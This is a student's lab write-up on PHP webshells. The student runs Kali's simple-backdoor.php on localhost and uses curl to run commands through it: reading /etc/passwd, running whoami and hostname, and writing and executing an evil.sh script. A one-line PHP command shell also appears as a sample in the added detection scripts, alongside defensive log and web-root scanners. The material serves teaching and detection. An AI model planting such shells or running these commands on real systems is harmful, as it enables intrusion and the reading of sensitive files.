Assignment 7.1 Webshells

This lab is the precursor to Lab 7.1 Exploiting Pippin. When exploiting Pippin, you likely made use of a webshell to get access to /etc/passwd on the target. In this assignment, you are going to dive a little deeper into how this actually works.

Preparation

  • Create a directory called webshell on Kali

  • Create a file called index.html

  • Copy /usr/share/webshells/php/simple-backdoor.php to the webshell directory

PHP Web Server

We can start a simple web server with PHP's built-in server. Here is the syntax. If you use a high port (above 1024) you do not need to be root, so do that instead of running the web server as root on our box.

Make sure you are listening on 127.0.0.1 and not 0.0.0.0 or your actual IP address. By listening on 127.0.0.1, we are not exposing our webshell to remote parties.

php -S 127.0.0.1:8090 -t .
[Screenshot: running our own web server]

Examine the webshell

Below are the contents of the PHP webshell that we copied to our webshell directory.

We will be using a URL of the form http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd (with target.com replaced by our own 127.0.0.1:8090) to query the web server we started above for information.

Deliverable 1: Provide a screenshot of your own /etc/passwd

Enter the command below to dump the /etc/passwd file!

curl http://127.0.0.1:8090/simple-backdoor.php?cmd=cat+/etc/passwd
[Screenshot: dump of /etc/passwd]

Below is the PHP web server logging the successful GET request for the /etc/passwd dump:

[Screenshot: web server log entry for the /etc/passwd request]
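That log line is the defender's view of the exercise: every command sent through the webshell arrives as a GET request whose query string carries the command. The following Python script is an added example, not part of the original assignment, that parses lines in the shape of the php -S server log (the sample lines below are constructed, not copied from the lab's screenshot), decodes the query string the way PHP does before the value reaches $_REQUEST (so `+` becomes a space and `%3E` becomes `>`), and flags requests whose query string carries a command-like parameter. The parameter-name list is an assumption meant to be tuned for a real deployment.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in the shape of the PHP built-in server log
# (php -S). Not taken from the original page.
SAMPLE_LOG = """\
[Thu Mar  7 10:15:01 2024] 127.0.0.1:51234 Accepted
[Thu Mar  7 10:15:01 2024] 127.0.0.1:51234 [200]: GET /index.html
[Thu Mar  7 10:15:01 2024] 127.0.0.1:51234 Closing
[Thu Mar  7 10:15:09 2024] 127.0.0.1:51240 [200]: GET /simple-backdoor.php?cmd=cat+/etc/passwd
[Thu Mar  7 10:15:22 2024] 127.0.0.1:51244 [200]: GET /simple-backdoor.php?cmd=echo+whoami+%3E+evil.sh
[Thu Mar  7 10:15:30 2024] 127.0.0.1:51250 [404]: GET /favicon.ico
[Thu Mar  7 10:15:41 2024] 127.0.0.1:51252 [200]: POST /upload.php
"""

# One request line: "[timestamp] client:port [status]: METHOD target"
REQUEST_RE = re.compile(
    r"^\[(?P<ts>[^\]]+)\] (?P<client>\S+) \[(?P<status>\d+)\]: "
    r"(?P<method>[A-Z]+) (?P<target>\S+)$"
)

# Query-string parameter names that simple command shells commonly use.
# Assumption: a starting point for tuning, not an exhaustive list.
COMMAND_PARAMS = {"cmd", "command", "exec", "execute"}


def parse_request(line):
    """Return a dict for a request line, or None for Accepted/Closing lines."""
    m = REQUEST_RE.match(line.rstrip("\n"))
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    # parse_qs turns '+' into a space and decodes %XX escapes, which is the
    # same decoding PHP applies before the value lands in $_REQUEST.
    rec["query"] = parse_qs(parts.query, keep_blank_values=True)
    return rec


def find_webshell_requests(log_text):
    """Flag requests whose query string carries a command-like parameter."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_request(line)
        if rec is None:
            continue
        for name, values in rec["query"].items():
            if name.lower() not in COMMAND_PARAMS:
                continue
            for value in values:
                hits.append({
                    "ts": rec["ts"],
                    "client": rec["client"],
                    "path": rec["path"],
                    "param": name,
                    "decoded_command": value,
                    "status": int(rec["status"]),
                })
    return hits


if __name__ == "__main__":
    for h in find_webshell_requests(SAMPLE_LOG):
        print(f"{h['ts']} {h['client']} {h['path']} "
              f"{h['param']}={h['decoded_command']!r} [{h['status']}]")
```

Run it against a real php -S log by reading the server's stderr into `find_webshell_requests`; the decoded command is what the shell on the server actually ran, which is what an incident responder wants in the timeline.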

Deliverable 2: Continuing with curl or your web browser and the webshell, get the following:

IP Address information

curl http://127.0.0.1:8090/simple-backdoor.php?cmd=ifconfig
[Screenshot: output of the ifconfig command]

Current User

curl http://127.0.0.1:8090/simple-backdoor.php?cmd=whoami
[Screenshot: output of whoami]

Hostname

curl http://127.0.0.1:8090/simple-backdoor.php?cmd=hostname
[Screenshot: output of hostname]

Try using your webshell and echo to create a script.sh file that has an arbitrary command in it.

Before I made the script, I wanted to figure out the correct syntax for making a normal text file.

curl "http://127.0.0.1:8090/simple-backdoor.php?cmd=echo+hello+>+hello.txt"

When passing a URL like this to curl, it is best practice to put it in quotation marks so that your shell hands special characters such as > and & through to curl instead of interpreting them itself.

[Screenshot: creating the file hello.txt on the server]

Here is the creation of the actual script in my PHP web server:

curl "http://127.0.0.1:8090/simple-backdoor.php?cmd=echo+whoami+>+evil.sh"

The command below runs the script, which executes whoami:
curl "http://127.0.0.1:8090/simple-backdoor.php?cmd=bash+evil.sh"
[Screenshot: creating a bash script called evil.sh and executing it with the bash command]
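After this exercise the web root holds two artifacts a defender would want to catch: a PHP file that passes request input straight into system() (the webshell examined earlier), and a shell script dropped beside it through that webshell. The following Python scanner is an added example, not part of the original assignment and not the contents of Kali's simple-backdoor.php. It builds a constructed sample web root in a temporary directory, flags PHP files in which a request superglobal reaches a command-execution sink either directly or through one variable assignment, and flags script files sitting in the web root. The sink list, the file extensions and the one-hop taint tracking are simplifying assumptions; a real scan would run over the live document root.

```python
import os
import re
import tempfile

# Constructed sample web root (not files from the original page): a clean page,
# a form handler that sanitizes its input, a one-line PHP command shell, a
# two-hop variant that goes through a variable, and a dropped shell script.
SAMPLE_FILES = {
    "index.html": "<html><body>hello</body></html>\n",
    "contact.php": "<?php\n$name = htmlspecialchars($_POST['name'] ?? '');\n"
                   "echo \"Thanks, $name\";\n",
    "backdoor.php": "<?php if(isset($_REQUEST['cmd'])){ system($_REQUEST['cmd']); } ?>\n",
    "admin/tools.php": "<?php\n$c = $_GET['c'];\necho shell_exec($c);\n",
    "evil.sh": "whoami\n",
}

SUPERGLOBAL_RE = re.compile(r"\$_(?:GET|POST|REQUEST|COOKIE|SERVER|FILES)\b")
ASSIGN_RE = re.compile(r"(\$[A-Za-z_]\w*)\s*=\s*([^;]+);")
# Assumed sink list: functions that hand a string to a shell or the PHP engine.
SINK_RE = re.compile(
    r"\b(system|exec|shell_exec|passthru|popen|proc_open|eval)\s*\(([^;]*)"
)
BACKTICK_RE = re.compile(r"`[^`]*`")
PHP_EXTS = {".php", ".phtml", ".php5"}
SCRIPT_EXTS = {".sh", ".bash", ".py", ".pl"}


def tainted_variables(src):
    """Variables assigned directly from a request superglobal (one hop only)."""
    return {var for var, rhs in ASSIGN_RE.findall(src) if SUPERGLOBAL_RE.search(rhs)}


def php_findings(src):
    """Return (sink, argument_text) pairs where request input reaches a sink."""
    tainted = tainted_variables(src)
    findings = []
    for sink, args in SINK_RE.findall(src):
        direct = SUPERGLOBAL_RE.search(args)
        via_var = any(re.search(re.escape(v) + r"\b", args) for v in tainted)
        if direct or via_var:
            findings.append((sink, args.strip().rstrip(")")))
    for bt in BACKTICK_RE.findall(src):  # `...` is shell_exec in PHP
        if SUPERGLOBAL_RE.search(bt) or any(v in bt for v in tainted):
            findings.append(("backtick", bt))
    return findings


def scan_webroot(root):
    """Walk a document root and report webshell-like PHP and dropped scripts."""
    report = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            ext = os.path.splitext(name)[1].lower()
            with open(path, "r", errors="replace") as fh:
                src = fh.read()
            if ext in PHP_EXTS:
                for sink, args in php_findings(src):
                    report.append((rel, f"request input reaches {sink}(): {args}"))
            elif ext in SCRIPT_EXTS or src.startswith("#!"):
                report.append((rel, "script file in web root"))
    return sorted(report)


def build_sample_webroot():
    """Write the constructed sample files into a fresh temporary directory."""
    root = tempfile.mkdtemp(prefix="webroot-")
    for rel, content in SAMPLE_FILES.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    for rel, msg in scan_webroot(build_sample_webroot()):
        print(f"{rel}: {msg}")
```

Pointing `scan_webroot` at a real document root turns the lab's own activity into findings: the webshell shows up as request input reaching system(), and the file written with `echo ... > evil.sh` shows up as a script that has no business being in a web root. The one-hop taint tracking is deliberately simple; anything passed through a function call or a second assignment is missed, which is the usual trade-off for a quick triage script.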
